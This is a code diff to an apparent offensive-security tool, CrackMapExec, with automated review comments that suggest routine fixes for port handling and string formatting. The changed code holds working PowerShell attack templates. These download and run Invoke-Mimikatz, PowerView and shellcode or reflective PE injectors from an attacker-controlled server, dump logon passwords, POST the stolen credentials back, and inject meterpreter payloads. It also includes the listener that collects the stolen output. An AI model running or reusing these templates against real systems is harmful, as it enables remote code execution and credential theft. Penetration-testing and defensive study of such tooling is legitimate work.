diff --git a/core/powershell.py b/core/powershell.py index 976eeb86..21c823cc 100644 --- a/core/powershell.py +++ b/core/powershell.py @@ -32,9 +32,9 @@ class PowerShell: def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1'); $creds = Invoke-{func_name} -Command '{katz_command}'; - $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/'); + $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds); @@ -42,8 +42,9 @@ class PowerShell: $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); - $request.GetResponse();""".format(protocol=self.protocol, - func_name=self.func_name, + $request.GetResponse();""".format(protocol=self.protocol, + port=settings.args.server_port, + func_name=self.func_name, addr=self.localip, katz_command=command) @@ -52,9 +53,9 @@ class PowerShell: def powerview(self, command): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1'); $output = {view_command} | Out-String; - $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/'); + $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($output); 
@@ -62,7 +63,8 @@ class PowerShell: $requestStream = $request.GetRequestStream(); $requestStream.Write( $bytes, 0, $bytes.Length ); $requestStream.Close(); - $request.GetResponse();""".format(protocol=self.protocol, + $request.GetResponse();""".format(protocol=self.protocol, + port=settings.args.port, addr=self.localip, view_command=command) @@ -70,12 +72,13 @@ class PowerShell: def inject_meterpreter(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1'); - Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol, + IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1'); + Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol, + settings.args.server_port, self.localip, self.func_name, - settings.args.inject[4:], - settings.args.met_options[0], + settings.args.inject[4:], + settings.args.met_options[0], settings.args.met_options[1]) if settings.args.procid: command += " -ProcessID {}".format(settings.args.procid) @@ -86,10 +89,11 @@ class PowerShell: def inject_shellcode(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1'); + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1'); $WebClient = New-Object System.Net.WebClient; - [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}'); + [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}'); Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol, + port=settings.args.server_port, func_name=self.func_name, addr=self.localip, shellcode=settings.args.path.split('/')[-1]) 
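Review bot: `port=settings.args.port` in powerview's `.format()` call fills the new `{port}` placeholder from the SMB `--port` option (constrained to 139/445 by the argparse line in crackmapexec.py), whereas every other method touched by this commit uses `settings.args.server_port`, so the URLs this method generates will name the wrong port. Change it to `port=settings.args.server_port,` so powerview agrees with mimikatz, inject_meterpreter, inject_shellcode and inject_exe_dll. The powerview method begins in the preceding hunk, outside this one.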
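Review bot: Inserting `{2}` for the port in inject_meterpreter forced every later positional placeholder to be renumbered, and a missed renumbering in a string like this misassigns arguments without any error; the sibling methods in this file use named fields, which do not have that hazard. Consider `'{protocol}://{addr}:{port}/Invoke-Shellcode.ps1'` with keyword arguments in `.format()`, matching the style already used by inject_shellcode and inject_exe_dll.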
@@ -103,11 +107,12 @@ class PowerShell: def inject_exe_dll(self): command = """ - IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1'); - Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol, - func_name=self.func_name, - addr=self.localip, - pefile=settings.args.path.split('/')[-1]) + IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1'); + Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol, + port=settings.args.server_port, + func_name=self.func_name, + addr=self.localip, + pefile=settings.args.path.split('/')[-1]) if settings.args.procid: command += " -ProcID {}" diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py index 3d5c179d..09d29825 100644 --- a/core/servers/mimikatz.py +++ b/core/servers/mimikatz.py @@ -89,14 +89,14 @@ class MimikatzServer(BaseHTTPRequestHandler): for line in buf: print_att(line.strip()) -def http_server(): - http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer) +def http_server(port): + http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer) t = Thread(name='http_server', target=http_server.serve_forever) t.setDaemon(True) t.start() -def https_server(): - https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer) +def https_server(port): + https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer) https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True) t = Thread(name='https_server', target=https_server.serve_forever) t.setDaemon(True) diff --git a/crackmapexec.py b/crackmapexec.py index 5945ce93..f8bc6a24 100755 --- a/crackmapexec.py +++ b/crackmapexec.py 
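Review bot: The unchanged context line `command += " -ProcID {}"` at the end of this hunk never calls `.format()`, so the literal `{}` is appended and `settings.args.procid` is dropped, while inject_meterpreter in the previous hunk does `command += " -ProcessID {}".format(settings.args.procid)`. This predates the commit, but since inject_exe_dll's format call is being rewritten here it is worth aligning the two: `command += " -ProcID {}".format(settings.args.procid)`. The method may continue past the last line of this hunk.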
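Review bot: Inside the new `def http_server(port):` the server object is still bound to a local named `http_server`, shadowing the function it lives in (the same holds for `https_server`); renaming the local to `server` removes that confusion now that the functions take an argument. The new `port` parameter is also undocumented; a one-line docstring such as `"""Start MimikatzServer on 0.0.0.0:port in a daemon thread."""` would state what the caller must supply. Because `port` goes straight into the bind tuple, an invalid value surfaces here only as a socket error in the thread rather than at argument parsing.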
@@ -72,7 +72,7 @@ parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Spe parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters') parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)") parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)') -#parser.add_argument("--server-port", type=int, help='Start the server on the specified port') +parser.add_argument("--server-port", type=int, help='Start the server on the specified port') #How much fail can we limit? can we fail at failing to limit? da da da dum parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)') @@ -150,6 +150,18 @@ args.target = args.target[0] patterns = [] targets = [] +if args.server == 'http': + if args.server_port: + args.http_port = args.server_port + else: + args.server_port = 80 + +if args.server == 'https': + if args.server_port: + args.https_port = args.server_port + else: + args.server_port = 443 + init_args(args) if args.verbose: @@ -245,10 +257,10 @@ else: if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja': if args.server == 'http': - http_server() + http_server(args.server_port) elif args.server == 'https': - https_server() + https_server(args.server_port) def concurrency(targets): '''
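Review bot: The newly enabled `--server-port` help text does not say what happens when the option is omitted, although the block added later in this file falls back to 80 or 443 depending on `--server`. Suggest `help='Port for the HTTP/HTTPS server (default: 80 for http, 443 for https)'` plus `metavar='PORT'`, consistent with `--fail-limit`. Since `type=int` accepts any integer, a post-parse `parser.error(...)` for values outside 1-65535 would give a clear message instead of a bind failure in the server thread.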
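Review bot: `args.http_port` and `args.https_port`, assigned in the two new branches, are not read anywhere in this diff — the start-up code below passes `args.server_port` to `http_server`/`https_server` — so those assignments appear to be dead and the two blocks reduce to a single default. `if args.server_port is None: args.server_port = 80 if args.server == 'http' else 443` does the same work in one place; the `is None` test also stops an explicit 0 from being treated as "not given", which the current truthiness check does. If the http_port/https_port attributes are consumed elsewhere in the project, a comment saying where would help the next reader.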